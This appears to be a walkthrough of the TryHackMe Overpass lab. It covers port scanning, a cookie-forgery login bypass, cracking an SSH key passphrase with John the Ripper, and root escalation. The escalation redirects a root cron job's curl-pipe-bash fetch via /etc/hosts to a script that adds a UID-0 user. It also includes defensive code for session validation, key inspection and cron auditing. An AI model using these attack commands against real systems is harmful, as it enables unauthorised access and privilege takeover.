Navigating the Digital Maze: A Comprehensive Walkthrough of the…

In the vast and often treacherous landscape of cybersecurity, challenges like the Overpass room on TryHackMe serve as both a test and a learning ground. This isn’t just another exercise; it’s a realistic web application challenge that combines a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path. So, buckle up as we embark on a journey to navigate this digital maze together.

The Overpass challenge is designed for those with a basic understanding of web enumeration, SSH, and privilege escalation. It’s a Linux-based system, and while it’s classified as easy, don’t be fooled by the label. Each step requires careful attention and a methodical approach. So, let’s dive in and explore the intricacies of this challenge.

Step 1: Initial Reconnaissance with Nmap

Our journey begins with the initial reconnaissance phase, where we use Nmap to scan the target machine. This tool is a powerhouse in the world of network exploration, allowing us to identify open ports and services. The command we use is:

```bash
nmap -p- <TARGET_IP>
```

This scan reveals two critical ports:

  • Port 22: SSH – Secure Shell, a protocol for secure remote login and other secure network services over an unsecured network.
  • Port 80: HTTP – Hypertext Transfer Protocol, the foundation of any data exchange on the Web.

The HTTP server is a Go server, but at this stage, it doesn’t appear to have any obvious vulnerabilities. This sets the stage for further enumeration.

Step 2: Web Enumeration to Discover Hidden Directories

Next, we navigate to the web server on port 80. Here, we find a simple webpage mentioning a project called “Overpass.” This is our first clue, and it’s crucial to delve deeper.

Directory Brute-Forcing with Gobuster

To uncover hidden directories, we use Gobuster, a directory brute-forcer. The command we use is:

```bash
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt
```

This scan reveals the /admin directory, which contains an admin login page. This is a significant find, as it provides us with a potential entry point into the system.

Exploiting the Admin Login Page

Upon inspecting the login page, we realize that conventional login attempts won’t work. This is where things get interesting. The source code reveals two interesting files:

  • login.js – This file contains the client-side code for the login page.
  • cookie.js – This file has a vulnerability where the SessionToken cookie is not validated properly.

By using a browser extension like Cookie Editor, we can add a SessionToken with a random value. This allows us to bypass authentication and access the admin panel. Inside, we find an SSH private key for a user named James.
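The bypass works because the client-side check only asks whether a SessionToken cookie exists, not whether the server ever issued that value. The following is an added example (not the Overpass application's code): the flawed presence check sits beside a check that validates the token against a server-side session store. The store, the TTL, and the function names are assumptions.

```python
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# Added example (not the Overpass application's own code): the admin page was
# bypassed because the check only asked whether a SessionToken cookie exists.
# Below, that flawed check sits beside one that validates the token against a
# server-side session store. Names, the TTL and the store are assumptions.


def insecure_is_admin(cookies: Dict[str, str]) -> bool:
    """Flawed logic: presence of the cookie is treated as proof of login."""
    return "SessionToken" in cookies


class SessionStore:
    """In-memory record of tokens the server actually issued (hypothetical)."""

    def __init__(self, ttl_seconds: int = 3600) -> None:
        self._sessions: Dict[str, Tuple[str, float]] = {}  # token -> (user, expiry)
        self._ttl = ttl_seconds

    def issue(self, username: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, unguessable
        self._sessions[token] = (username, now + self._ttl)
        return token

    def lookup(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the user bound to an issued, unexpired token, else None."""
        now = time.time() if now is None else now
        if not token.isascii():
            return None  # compare_digest needs ASCII str; issued tokens always are
        match = None
        for stored, (user, expiry) in self._sessions.items():
            # constant-time comparison so timing does not leak token bytes
            if hmac.compare_digest(stored, token):
                match = (stored, user, expiry)
        if match is None:
            return None
        stored, user, expiry = match
        if now > expiry:
            del self._sessions[stored]  # expired: forget it and reject
            return None
        return user


def secure_is_admin(cookies: Dict[str, str], store: SessionStore,
                    now: Optional[float] = None) -> bool:
    """Accept only a token the server issued to the admin user."""
    token = cookies.get("SessionToken", "")
    return store.lookup(token, now) == "admin"


if __name__ == "__main__":
    forged = {"SessionToken": "random-value-set-with-a-cookie-editor"}
    store = SessionStore()
    print("insecure check accepts forged cookie:", insecure_is_admin(forged))       # True
    print("secure check accepts forged cookie:  ", secure_is_admin(forged, store))  # False
    real = {"SessionToken": store.issue("admin")}
    print("secure check accepts issued cookie:  ", secure_is_admin(real, store))    # True
```

The point of the secure variant is that the cookie carries no authority of its own: the server looks the value up in state only it can write, so a value typed into a cookie editor matches nothing and is rejected.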

Step 3: Cracking the SSH Key Passphrase

The SSH key is protected with a passphrase, which we can crack using John the Ripper, a fast password cracker. The process involves two main steps:

Converting the Key to a Crackable Format

First, we convert the key to a format John can read. The command we use is:

```bash
ssh2john privatesshkeyfile > overpass.hash
```

Cracking the Passphrase with John the Ripper

Next, we use John to crack the passphrase. The command we use is:

```bash
john overpass.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

After successfully cracking the passphrase “james13”, we can log in over SSH with the following command:

```bash
ssh -i privatesshkeyfile james@<TARGET_IP>
```

Once inside, we find the first flag in the user.txt file.
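A passphrase-protected key falling to rockyou.txt in seconds is worth a closer look from the defender's side: a weak passphrase is one half of it, and the other half is how the key file stretches that passphrase. The following is an added example, not part of the original walkthrough or of John the Ripper: a small inspector that reads an OpenSSH private key file and reports whether it is encrypted and with what key derivation (legacy PEM keys use a single MD5 round; the openssh-key-v1 format uses bcrypt with a configurable round count, 16 by default). The sample keys in the block are constructed headers with no real key material, and the helper names are my own.

```python
import base64
import struct
import textwrap
from typing import List, Optional

# Added example, not the walkthrough's or John the Ripper's code: inspects an
# OpenSSH private key file and reports how its passphrase is stretched. The
# sample keys below are constructed headers only, with no real key material.

MAGIC = b"openssh-key-v1\x00"
DEFAULT_BCRYPT_ROUNDS = 16  # what ssh-keygen uses unless -a is given


def _read_string(blob: bytes, off: int):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def _inspect_openssh_v1(blob: bytes) -> dict:
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    rounds: Optional[int] = None
    if kdf == b"bcrypt":
        _salt, o = _read_string(kdfopts, 0)   # kdfoptions = string salt, uint32 rounds
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return {"format": "openssh-v1", "encrypted": cipher != b"none",
            "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}


def inspect_private_key(pem_text: str) -> dict:
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        return _inspect_openssh_v1(base64.b64decode("".join(lines[1:-1])))
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): encryption is signalled by
    # headers, and the key is derived from the passphrase with one MD5 round.
    info = {"format": "pem", "encrypted": False, "cipher": None, "kdf": None, "rounds": None}
    for ln in lines[1:]:
        if ln == "":
            break  # blank line ends the header block
        if ln.startswith("Proc-Type:") and "ENCRYPTED" in ln:
            info["encrypted"] = True
        elif ln.startswith("DEK-Info:"):
            info["cipher"] = ln.split(":", 1)[1].strip().split(",")[0]
            info["kdf"], info["rounds"] = "md5-evp_bytestokey", 1
    return info


def assess(info: dict) -> List[str]:
    """Findings a defender would act on for one key file."""
    findings = []
    if not info["encrypted"]:
        findings.append("unencrypted private key: anyone who can read the file can use it")
    elif info["format"] == "pem":
        findings.append("legacy PEM encryption (single MD5 round): a wordlist attack runs at "
                        "full speed; re-encrypt with 'ssh-keygen -p -o -a 64'")
    elif info["kdf"] == "bcrypt" and info["rounds"] < DEFAULT_BCRYPT_ROUNDS:
        findings.append(f"bcrypt rounds={info['rounds']} is below the ssh-keygen default "
                        f"of {DEFAULT_BCRYPT_ROUNDS}")
    return findings


def build_openssh_v1_header(cipher: str, kdf: str, rounds: int) -> str:
    """Constructed test input: a valid openssh-key-v1 prefix with empty key data."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    body = (MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(kdfopts)
            + struct.pack(">I", 1) + s(b"") + s(b""))   # nkeys=1, empty pub/priv sections
    b64 = textwrap.fill(base64.b64encode(body).decode(), 70)
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy-format sample: the headers are real, the body is filler.
LEGACY_PEM_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for label, key in [("legacy pem", LEGACY_PEM_SAMPLE),
                       ("bcrypt/16", build_openssh_v1_header("aes256-ctr", "bcrypt", 16)),
                       ("no passphrase", build_openssh_v1_header("none", "none", 0))]:
        info = inspect_private_key(key)
        print(label, info, assess(info))
```

Run it over `~/.ssh/*` on a host you administer and the findings tell you which keys would crack at wordlist speed even with a reasonable passphrase; the fix is a stronger passphrase plus re-encryption in the bcrypt format with a high round count.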

Bonus: Decoding James’s Hidden Password

In James’s home directory, we find a hidden file named .overpass, which contains his SSH password encoded with ROT13. Decoding it gives us the password: “saydrawnlyingpicture”. This is a classic example of how simple encoding can be a security risk if not handled properly.

Step 4: Privilege Escalation to Root

Now, it’s time to escalate our privileges. After checking for SUID binaries and running sudo -l, we turn to LinPEAS, a script that performs a thorough system enumeration for us. The process involves two main steps:

Downloading and Executing LinPEAS

First, we host a Python server on our attacking machine:

```bash
python3 -m http.server 8080
```

Then, we download and execute LinPEAS on the target machine:

```bash
wget http://<ATTACKER_IP>:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

Exploiting the Cron Job

LinPEAS reveals a cron job running every minute:

```bash
# entry in /etc/crontab, scheduled every minute
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
```

To exploit this, we modify the /etc/hosts file to redirect overpass.thm to our attacking machine:

```bash
vim /etc/hosts
# point the overpass.thm entry at the attacking machine:
<ATTACKER_IP> overpass.thm
```

Now, we host a malicious buildscript.sh on our Python server:

```bash
useradd -ou 0 -g 0 newroot
echo "newroot:password" | chpasswd
```

Once the cron job runs, it will download and execute our script, creating a new root user. We can then log in with the new user and grab the root flag from the /root directory.
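What made this escalation possible is a root cron job that fetches a script over plain HTTP from a hostname and pipes it straight into a shell, combined with a writable /etc/hosts that lets a low-privileged user decide where that hostname resolves. The following is an added example, not part of the original walkthrough or of LinPEAS: a small checker that scans crontab text for fetch-and-execute entries and reports whether the fetched hostname is pinned in an /etc/hosts-style file. The crontab and hosts samples are constructed for the demo, and the function names are my own.

```python
import re
from typing import Dict, List, Optional

# Added example (not the walkthrough's or LinPEAS's code): flags cron entries
# that pipe curl/wget output into an interpreter and notes whether the fetched
# host is pinned in /etc/hosts. All sample data below is constructed.

SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * root wget -qO- http://updates.example.internal/patch.sh | sh
0 3 * * * backup /usr/local/bin/backup.sh
"""

SAMPLE_HOSTS = """\
127.0.0.1 localhost
192.0.2.10 overpass.thm
"""

FETCH_TOOLS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
# five schedule fields, the user field (system crontab), then the command
CRON_LINE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")


def fetched_host(fetch_segment: str) -> Optional[str]:
    """Host name from the first non-flag argument of a curl/wget command."""
    for arg in fetch_segment.split()[1:]:
        if not arg.startswith("-"):
            return arg.split("://", 1)[-1].split("/", 1)[0]
    return None


def fetch_pipe_host(command: str) -> Optional[str]:
    """Return the remote host when the command pipes curl/wget into an interpreter."""
    segments = [s.strip() for s in command.split("|")]
    for left, right in zip(segments, segments[1:]):
        left_words, right_words = left.split(), right.split()
        if (left_words and right_words
                and left_words[0] in FETCH_TOOLS and right_words[0] in INTERPRETERS):
            return fetched_host(left) or "<unknown>"
    return None


def parse_hosts(hosts_text: str) -> Dict[str, str]:
    """Map each name in an /etc/hosts-style file to the address it is pinned to."""
    pinned: Dict[str, str] = {}
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        for name in fields[1:]:
            pinned[name] = fields[0]
    return pinned


def find_risky_cron_entries(crontab_text: str, hosts_text: str = "") -> List[dict]:
    pinned = parse_hosts(hosts_text)
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue  # blank lines, comments and VAR=value lines
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, user, command = m.groups()
        host = fetch_pipe_host(command)
        if host is None:
            continue
        findings.append({
            "line": lineno, "user": user, "schedule": schedule, "host": host,
            "pinned_in_hosts": pinned.get(host),  # address a local edit would control
            "command": command,
        })
    return findings


if __name__ == "__main__":
    for finding in find_risky_cron_entries(SAMPLE_CRONTAB, SAMPLE_HOSTS):
        print(finding)
```

Each finding names the user the job runs as, the host the script comes from, and the address /etc/hosts pins it to; a root job whose source hostname resolves through a file other users can write is the pattern to remove (ship the script on the host, verify it by hash, and restore /etc/hosts to root-only writes).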

Conclusion

The Overpass challenge is a comprehensive exercise that tests our knowledge of web enumeration, SSH, and privilege escalation. It’s a realistic scenario that mirrors real-world vulnerabilities and exploits. By carefully following each step and understanding the underlying concepts, we can navigate this digital maze and emerge victorious.

Remember, the key to success in cybersecurity is not just about the tools we use, but also about our understanding and approach. Each challenge is an opportunity to learn and grow, so embrace the process and enjoy the journey.

FAQ

What is the Overpass challenge?

The Overpass challenge is a realistic web application challenge on TryHackMe that includes a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path.

What skills are required for the Overpass challenge?

The Overpass challenge requires a basic understanding of web enumeration, SSH, and privilege escalation.

What tools are used in the Overpass challenge?

The Overpass challenge involves the use of Nmap, Gobuster, John the Ripper, and LinPEAS.

How do I crack the SSH key passphrase in the Overpass challenge?

You can crack the SSH key passphrase in the Overpass challenge using John the Ripper. First, convert the key to a format John can read, then use John to crack the passphrase.

How do I exploit the cron job in the Overpass challenge?

To exploit the cron job in the Overpass challenge, modify the /etc/hosts file to redirect overpass.thm to your attacking machine. Then, host a malicious buildscript.sh on your Python server. Once the cron job runs, it will download and execute your script, creating a new root user.

What is the final goal of the Overpass challenge?

The final goal of the Overpass challenge is to escalate your privileges to root and grab the root flag from the /root directory.
